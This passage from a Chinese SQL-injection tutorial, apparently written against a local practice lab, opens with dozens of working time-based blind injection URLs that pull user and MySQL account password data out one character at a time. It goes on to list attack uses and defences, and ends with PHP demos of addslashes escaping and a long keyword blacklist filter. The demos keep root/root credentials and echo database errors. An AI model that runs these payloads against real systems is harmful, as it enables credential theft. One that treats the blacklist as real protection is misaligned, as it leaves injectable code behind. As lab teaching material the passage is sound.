http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),10,1)) from security.users limit 0,1)=109,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),11,1)) from security.users limit 0,1)=98,sleep(5),1)--+

4.6猜mysql user信息

猜一共有多少个用户

http://192.168.1.10:9999/Less-9/?id=1' and if((( select count(concat_ws('---',host,user,Password))from `mysql`.user) = 4),sleep(5),1) --+

猜获取的第二列用户数据的长度

http://192.168.1.10:9999/Less-9/?id=1' and if((( select length(concat_ws('-',host,user,Password))from `mysql`.user limit 1,1) = 18),sleep(5),1) --+

猜第二列用户数据的ascii码

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),1,1))from `mysql`.user limit 1,1) =98 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),2,1))from `mysql`.user limit 1,1) =99 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),3,1))from `mysql`.user limit 1,1) =53 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),4,1))from `mysql`.user limit 1,1) =51 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),5,1))from `mysql`.user limit 1,1) =101 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),6,1))from `mysql`.user limit 1,1) =54 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),7,1))from `mysql`.user limit 1,1) =102 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),8,1))from `mysql`.user limit 1,1) =48 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),9,1))from `mysql`.user limit 1,1) =52 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),10,1))from `mysql`.user limit 1,1) =101 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),11,1))from `mysql`.user limit 1,1) =97 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),12,1))from `mysql`.user limit 1,1) =102 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),13,1))from `mysql`.user limit 1,1) =45 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),14,1))from `mysql`.user limit 1,1) =114 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),15,1))from `mysql`.user limit 1,1) =111 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),16,1))from `mysql`.user limit 1,1) =111 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),17,1))from `mysql`.user limit 1,1) =116 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),18,1))from `mysql`.user limit 1,1) =45 ,sleep(5),1) --+

##将ascii码转换为对应字符即得到数据

5.SQL注入利用点

  • 绕过网页前端认证直接进入后台管理;
    • 获取数据库的数据,如网站的管理账号密码,用户注册信息;
    • 修改数据库的数据,篡改网页内容或者放置木马链接,添加修改管理员账户;
    • 读取系统文件,写入木马获取shell,删除系统文件导致系统崩溃;
    • 通过注入实现命令执行反弹shell

6.防御SQL注入

服务器层面:

  • 服务器前端部署waf、 ips、 数据库审计 、使用云防护来防御

  • 服务器上可以安装软waf

  • web应用不用root用户连接数据库,使用能满足使用需求的最小权限的用户;

  • 关闭错误提示(PHP配置文件php.ini中的display_errors=Off)

  • 开启PHP的魔术配置,开启安全配置模式

    将safe_mode开启on.以及关闭全局变量模式,register_globals参数设置为on,magic_quotes_gpc参数开启


代码层面:

  • 参数化查询

引发SQL注入最根本原因之一是将SQL查询构建成字符串(动态字符串构造),然后提交给数据库执行。更安全的动态字符串构造方法是使用占位符或绑定变量来向SQL查询提供参数(而非直接对用户参数进行操作)。使用参数化查询可以避免很多常见的SQL注入问题,另外,由于数据库可以根据提供的预备语句来优化查询,使用参数化查询还能提高数据库查询的性能。

  • 输入验证

白名单

白名单验证只接收已经记录在案的良好输入的操作,在接收输入并进一步处理之前验证输入是否符合所期望的类型、长度或大小、数字范围或其他格式标准。

黑名单

黑名单验证机制值拒绝已记录在案的不良输入的操作,通过浏览器输入的内容来查找是否存在已知的不良字符、字符串或模式。如果输入中包含众所周知的恶意内容,则会拒绝它。使用黑名单验证要比白名单弱,因为潜在的不良字符列表非常大,这会导致不良内容列表也很大,检索起来慢且不全,而且很难及时更新这些内容。

  • PHP使用PDO连接数据库

  • 使用正则过滤输入的字符串,对特殊的字符进行转义、 过滤、 替换、 删除

7.编写防御代码

7.1addslashes() 转义特殊字符

<html>
    <head>
        <title>回显注入</title>
    </head> 
    <body>
        <div style="text-align: center;margin: auto;" >
                <form action="sql_hx.php" method="get"> 
                输入用户ID:<input type="text" name="user_id"/>

                <input type="submit" value="查询" name="submit"/> 
            </form>
        </div>
        <?php 
            if(isset($_REQUEST["submit"])){
                $user_id=addslashes($_REQUEST["user_id"]);
                $sql = "select name,age from user where id = '$user_id';";
                //echo $sql;
                $servername = "127.0.0.1";
                $username = "root";
                $password = "root";
                $dbname = "test";

                // 创建连接
                $conn = new mysqli($servername, $username, $password, $dbname);
    // Check connection
                if ($conn->connect_error) {
                    die("连接失败: " . $conn->connect_error);
                } 

                $result = $conn->query($sql);

    if ($result->num_rows > 0) {
        // 输出数据
        while($row = $result->fetch_assoc()){
        echo '<div style="text-align: center; border-style: solid; width: 40%;margin: auto;">';
        echo "<p>". $sql . "</p>";
        echo '<p style="font-weight: bold;font-size: large;">---user info---</p>';
        echo "<p> name:" . $row["name"]. "</p>";
        echo "<p> age:" . $row["age"]. "</p></div>";
        }
    } else {

        echo '<div style="text-align: center; border-style: solid; width: 20%;margin: auto;">';
            echo '<p style="font-weight: bold;font-size: large;">---user info---</p>';
        echo "<p> 找不到该用户请重新输入</p></div>";
    }
    $conn->close(); 
            }
        ?>  
    </body>
</html>

测试

直接输入单引号被转义

image-20210613114221170

将payload url编码也会被转义

image-20210613115243992

单引号16进制编码,不能正常运行

image-20210613115424133

7.2过滤字符串

添加一个过滤函数将含有攻击性的字符替换为空


<html>
    <head>
        <title>报错注入</title>
    </head> 
    <body>
        <div style="text-align: center;margin: auto;" >
                <form action="sql_bc.php" method="get"> 
                输入用户ID:<input type="text" name="user_id"/>

                <input type="submit" value="查询" name="submit"/> 
            </form>
        </div>
        <?php 
        function filter($str)
{
    if (empty($str)) return false;
    $str = htmlspecialchars($str);
    $str = str_replace( '/', "", $str);
    $str = str_replace( '"', "", $str);
    $str = str_replace( '(', "", $str);
    $str = str_replace( ')', "", $str);
    $str = str_replace( 'CR', "", $str);
    $str = str_replace( 'ASCII', "", $str);
    $str = str_replace( 'ASCII 0x0d', "", $str);
    $str = str_replace( 'LF', "", $str);
    $str = str_replace( 'ASCII 0x0a', "", $str);
    $str = str_replace( ',', "", $str);
    $str = str_replace( '%', "", $str);
    $str = str_replace( ';', "", $str);
    $str = str_replace( 'eval', "", $str);
    $str = str_replace( 'open', "", $str);
    $str = str_replace( 'sysopen', "", $str);
    $str = str_replace( 'system', "", $str);
    $str = str_replace( '$', "", $str);
    $str = str_replace( "'", "", $str);
    $str = str_replace( "'", "", $str);
    $str = str_replace( 'ASCII 0x08', "", $str);
    $str = str_replace( '"', "", $str);
    $str = str_replace( '"', "", $str);
    $str = str_replace("", "", $str);
    $str = str_replace("&gt", "", $str);
    $str = str_replace("&lt", "", $str);
    $str = str_replace("<SCRIPT>", "", $str);
    $str = str_replace("</SCRIPT>", "", $str);
    $str = str_replace("<script>", "", $str);
    $str = str_replace("</script>", "", $str);
    $str = str_replace("select","",$str);
    $str = str_replace("join","",$str);
    $str = str_replace("union","",$str);
    $str = str_replace("where","",$str);
    $str = str_replace("insert","",$str);
    $str = str_replace("delete","",$str);
    $str = str_replace("update","",$str);
    $str = str_replace("like","",$str);
    $str = str_replace("drop","",$str);
    $str = str_replace("DROP","",$str);
    $str = str_replace("create","",$str);
    $str = str_replace("modify","",$str);
    $str = str_replace("rename","",$str);
    $str = str_replace("alter","",$str);
    $str = str_replace("cas","",$str);
    $str = str_replace("&","",$str);
    $str = str_replace(">","",$str);
    $str = str_replace("<","",$str);
    $str = str_replace(" ",chr(32),$str);
    $str = str_replace(" ",chr(9),$str);
    $str = str_replace("    ",chr(9),$str);
    $str = str_replace("&",chr(34),$str);
    $str = str_replace("'",chr(39),$str);
    $str = str_replace("<br />",chr(13),$str);
    $str = str_replace("''","'",$str);
    $str = str_replace("css","'",$str);
    $str = str_replace("CSS","'",$str);
    $str = str_replace("<!--","",$str);
    $str = str_replace("convert","",$str);
    $str = str_replace("md5","",$str);
    $str = str_replace("passwd","",$str);
    $str = str_replace("password","",$str);
    $str = str_replace("../","",$str);
    $str = str_replace("./","",$str);
    $str = str_replace("Array","",$str);
    $str = str_replace("or 1='1'","",$str);
    $str = str_replace(";set|set&set;","",$str);
    $str = str_replace("`set|set&set`","",$str);
    $str = str_replace("--","",$str);
    $str = str_replace("OR","",$str);
    $str = str_replace('"',"",$str);
    $str = str_replace("*","",$str);
    $str = str_replace("-","",$str);
    $str = str_replace("+","",$str);
    $str = str_replace("/","",$str);
    $str = str_replace("=","",$str);
    $str = str_replace("'/","",$str);
    $str = str_replace("-- ","",$str);
    $str = str_replace(" -- ","",$str);
    $str = str_replace(" --","",$str);
    $str = str_replace("(","",$str);
    $str = str_replace(")","",$str);
    $str = str_replace("{","",$str);
    $str = str_replace("}","",$str);
    $str = str_replace("-1","",$str);
    $str = str_replace("1","",$str);
    $str = str_replace(".","",$str);
    $str = str_replace("response","",$str);
    $str = str_replace("write","",$str);
    $str = str_replace("|","",$str);
    $str = str_replace("`","",$str);
    $str = str_replace(";","",$str);
    $str = str_replace("etc","",$str);
    $str = str_replace("root","",$str);
    $str = str_replace("//","",$str);
    $str = str_replace("!=","",$str);
    $str = str_replace("$","",$str);
    $str = str_replace("&","",$str);
    $str = str_replace("&&","",$str);
    $str = str_replace("==","",$str);
    $str = str_replace("#","",$str);
    $str = str_replace("@","",$str);
    $str = str_replace("mailto:","",$str);
    $str = str_replace("CHAR","",$str);
    $str = str_replace("char","",$str);
    return $str;
}
            if(isset($_REQUEST["submit"])){
                $user_id= filter($_REQUEST["user_id"]);
                echo $user_id;
                $sql = "select name,age from user where id = '$user_id';";

                $servername = "127.0.0.1";
                $username = "root";
                $password = "root";
                $dbname = "test";

                // 创建连接
                $conn = new mysqli($servername, $username, $password, $dbname);
    // Check connection
                if ($conn->connect_error) {
                    die("连接失败: " . $conn->connect_error);
                } 

                $result = $conn->query($sql);

    if ($result->num_rows > 0) {
        // 输出数据
        while($row = $result->fetch_assoc()){
        echo '<div style="text-align: center; border-style: solid; width: 20%;margin: auto;">';
        echo "<p>". $sql . "</p>";
        echo '<p style="font-weight: bold;font-size: large;">---user info---</p>';
        echo "<p> name" . $row["name"]. "</p>";
        echo "<p> age " . $row["age"]. "</p></div>";
        }
    } else {

        echo '<div style="text-align: center; border-style: solid; width: 20%;margin: auto;">';
        echo '<p style="font-weight: bold;font-size: large;">---user info---</p>';
        echo $sql;
        echo ($conn->error);
        echo "<p> 找不到该用户请重新输入</p></div>";

    }
    $conn->close(); 
            }
        ?>  
    </body>
</html>